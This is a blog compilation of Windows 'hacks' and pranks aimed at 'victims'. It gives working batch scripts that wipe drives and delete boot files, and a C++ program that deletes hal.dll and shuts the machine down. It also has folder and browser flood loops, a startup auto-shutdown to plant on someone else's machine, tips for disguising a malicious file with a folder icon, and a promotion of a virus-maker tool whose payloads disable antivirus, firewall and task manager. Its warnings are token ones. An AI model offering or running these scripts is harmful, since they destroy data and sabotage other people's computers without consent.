Hacking

Hey guys, I’m back with my next post. If you are not a computer professional, don’t read this, even if you do. Don’t ever try this on any of your computers. Trying any of these are really painful and will take you a lot of time to recover.If you got somebody really irritating in your life and stalking you every once in a while then this is the right post for you. But please do think twice before you teach that poor soul a lesson. And once again I’m warning you. Please don’t use these if you are not sure of what your purpose of using these hacks is. Now let’s get started. These hacks are merely pranks that will frustrate your victims to the core.

1. Crash a Computer System With Nothing But a Link.

I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.

WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

Click Here. (http://tiny.cc/ibJUN)

2. Create more than 3,000 folders under a minute.

Step 1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top

Step 2) Save it as 1000.bat

@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.

Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.

Here’s what I did with my file.

If my victim clicks on the file. He’s gonna see the hottest chics that he’s never seen in his entire life don’t you think?

3) Shutdown A Computer Forever!

Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.

DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It with Extension .cmd or .bat.

4) Another RAM crashing Trick :

open notepad and type

:A
start www.coolpctips.com
goto A

save with .bat extension.
Infinitely loops your browser to open up coolpctips.

Do this and your victim will have infinite pages of coolpctips flooded on his computer screen.

5) Delete all your system files with just 6 character command.

Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.

Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!

Here are some cool notepad tricks for you guys. Some of these are pranks, they may not work if they are pretty good with computers or you’re trying these on anyone whose background originates from computer field. Apart from these any kind of victims will do. This is just a fun article, just enjoy reading and I’m sure you’ll learn something new about notepad.

Notepad Diary :

Do you keep a diary (Or maybe a journal or something to keep a track of your daily activities and routines) Or do you wish to make notes where the notes keep the date automatically?Do you watch movies and keep a track of them??Like when you’ve watched it and stuff?? Well here is a cool trick that im gonna show you.Its upto you how you use it. All you need is notepad.

1) Open a blank notepad file.

2) Type .LOG in all caps at the top and hit enter.
3) Now save the file as you wish.
4) After closing the file, open it again and you will notice that the date & time is now listed on the second line.
5) You will also notice that the cursor is ready for you to start typing on the next line.

6) Now every time you open it, type something on the next line and then save it,close it, when you open it again, it will have automatically saved the date and time on the last line.

It keeps a running record of date and time for every save. Now you have a diary ! Have Fun !

Matrix Coding :

Next Trick that I’m gonna show you is to create similar to the Coded-Screen From the movie Matrix!! The screen where random numbers appear in the movie and a techie sits right in front of the computer and guides “Neo” through all troubles.Anyway if you don’t have an idea just have a look at the matrix screen from the following youtube link here.
Lets try to create a similar screen just by using a notepad.Just Copy paste the following code into your Notepad and save the file as Matrix.bat.”Matrix” is not necessary, you can save it with whatever name you wish but its important that you save it with .bat extension.
Here’s the code.

****************************
@echo off

color 02es

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start
****************************

This is nothing but usage of few simple notepad commands to create out Matrix screen.Let us understand what these commands do and how they function in brief.

Echo - Echos the screen.

Color – Displays the text content in the color that you mentioned.

:- This is similar to the “go-to” marker in C-Language. (Not a problem if you’re not experienced with C-Language. Just thought you should know)

%random – This prints a random number on the screen.

goto – this points that the function must be passed to “start” again to make it an indefinite loop.

Your screen must look something like this.

Fake Virus :

Deleting Files message to freak everyone out.

Just copy the following code and save it as a batch file like we spoke.

@echo off
cls
echo Fatal Error!! Your computer is under attack!!
pause
echo Deleting Files
pause
:files
echo !323%%%@#@GJFGG42JG
echo !3424%@#%^&@52%@%gs
echo !@$@^624@$6262$hG
echo !@#4-07234&5*((6hkd
echo !&^%78755&*%478*%$&
echo !^$$68*$78()&4578
echo !&8898*65$$566$68(9
goto files

If you want your victim to run this,save it in startup or you can just make him click your batch file and enjoy the look on your victim’s face.

Auto-Shutdown Code :

This is the real deal.This trick is so simple and so easy,but really leeches-out the life of even the toughest of the programmers making them wonder how to fix it.Now before you do this,just make sure this is only a prank and nothing more.I’ll tell you each and everything about this but you will have to make sure you restore the computer back to normal after using this trick. Trust me its fun,not at all dangerous.Its the kinda trick that is so easy and makes people wonder why is your computer acting so weird. Lets get started. just open notepad and type the following code.

msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
shutdown -t

That’s it!!! Yep! That’s the code, as simple as it looks. Now save it as virus.bat, or anything you wish, just make sure it’s under .bat extension.Now here’s the real deal that makes this trick so annoying.Now take the batch file that you created and place it in the Windows startup.For those of you all who don’t know where startup is, no problemo! It’s in Start(Windows button on the left bottom of your screen), and there it will be, the windows startup.Just place the batch file in it and your trick is set to play a prank on your victim. The next time you switch on your computer your computer will look for the files in the startup directory and run them!! when your batch file is executed. It will display a message

“Fatal Error! Your Computer Will Shutdown in few Moments! “

You will next get a message box with a count-down for shutdown of your computer.You will have just a minute to remove the batch file from the startup directory to stop this from running again.Unless and until the file is removed from the startup . Your computer will shutdown every time you turn it on!! So don’t forget to remove the file from the startup directory. Just remember use this trick for fun purposes only( or you can use it in your college if you hate your lecturers, Because that’s what I do. :P Psssst,keep it a secret). Anyway I guess you have understood everything clearly.The outcomes of this trick is solely your responsibility.Have Fun!!

How To Make Some Powerful Viruses On Your Own

by Satish Coolpctips on August 9, 2010 · 12 comments

I AM NOT RESPONSIBLE IF ANYTHING GOES WRONG WITH YOUR SYSTEM.

Yes we can make some powerful virus on our own and can create a disaster in our enemies system. i have created 60 different virus applications which stop the functionality of windows applications and make your system useless. There is nothing to code or nothing to program all we have to do is to download a application called as acid virus maker and with this we can create powerful windows virus and BAT files which can really harm the system for sure.
There are different types of windows virus in this software and some are useful and some are dangerous. These virus are simple to create and easy to apply in ones system. once clicked it will start its functionality and do the work assigned to it. There is a List of virus where we can create on our own.
We can also Enable or Disable the some windows applications and can create virus files which will be deleted when run. The list of windows batch which we can create in this software are:
A) Open/Disable Options.
B) Delete Files When Run.
In this Open/Disable Options coloum we can create :
1) Open CMD
2) Open Notepad
3) Shutdown PC
5) Disable MSCONFIG
6) Disable REGEDIT
7) Disable system restore
8) Disable Task Manager
9) Disable Screen saver
10) Disable Firewall
11) Disable paint
12) Disable magnify
13) Disable Notepad
14) Disable Calculator
15) Open Malicious sites
16) Make Spam folders
17) Kill Internet Connection
18) Disable CMD
19) Disable Live Messenger
20) Disable Yahoo Messenger
21) Disable Mouse
22) Disable Keyboard
23) Disable Nod32
24) Disable Avast
25) Disable Norton
26) Disable Malware bytes
27) Disable Kaspersky
28) Disable Firefox
29) Disable Internet Explorer
30) Disable Safe Mode
31) Disable Disk Fragmentation
32) Spam Victims PC
33) Disable Uninstall
34) Add on Startup


And Also some Delete files when Run or Opened the virus.
35) Delete all .DOC Files
36) Delete all .MP3 Files
37) Delete all .WMV Files
38) Delete all .VBS Files
39) Delete all .PPS Files
40) Delete all .WAV Files
41) Delete all .INI Files
42) Delete all .OCX Files
43) Delete all TXT Files
44) Delete all PNG Files
45) Delete all EXE Files
46) Delete all CFG Files
47) Delete all JPG Files
48) Delete all BAT Files
49) Delete all PDF Files
50) Delete all ICO Files
51) Delete all AVI Files
52) Task Kill System Process
These are the 52 BAT applications which we can create using the application Acid Virus Maker. To create a virus just open the application and check the tick mark on the application which you want to use and give a virus name without any spaces and be careful that you are putting a single file name without any special characters and add a comment if you want and click on Make button which is beside About. A BAT file is create in C: drive just copy that and use where ever you want to use it.
BUT PLEASE DON’T USE DELETE ALL…………. BAT VIRUS APPLICATIONS IN YOUR OWN SYSTEMS. THIS IS REALLY HARMFUL TO YOUR COMPUTER.

Reveal *****(Asterisk) Passwords Using Javascript

by Satish Coolpctips on March 24, 2010 · 10 comments

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your ‘Username’ and ‘Password’.

3) Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’.

javascript: alert(document.getElementById(‘Passwd’).value);

4) As soon as you press ‘Enter’, A window pops up showing Password typed by you..!

Powerful C++ Virus

by Satish Coolpctips on March 11, 2010 · 6 comments

This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.

The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(“shutdown -s -r”);
system(“PAUSE”);
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.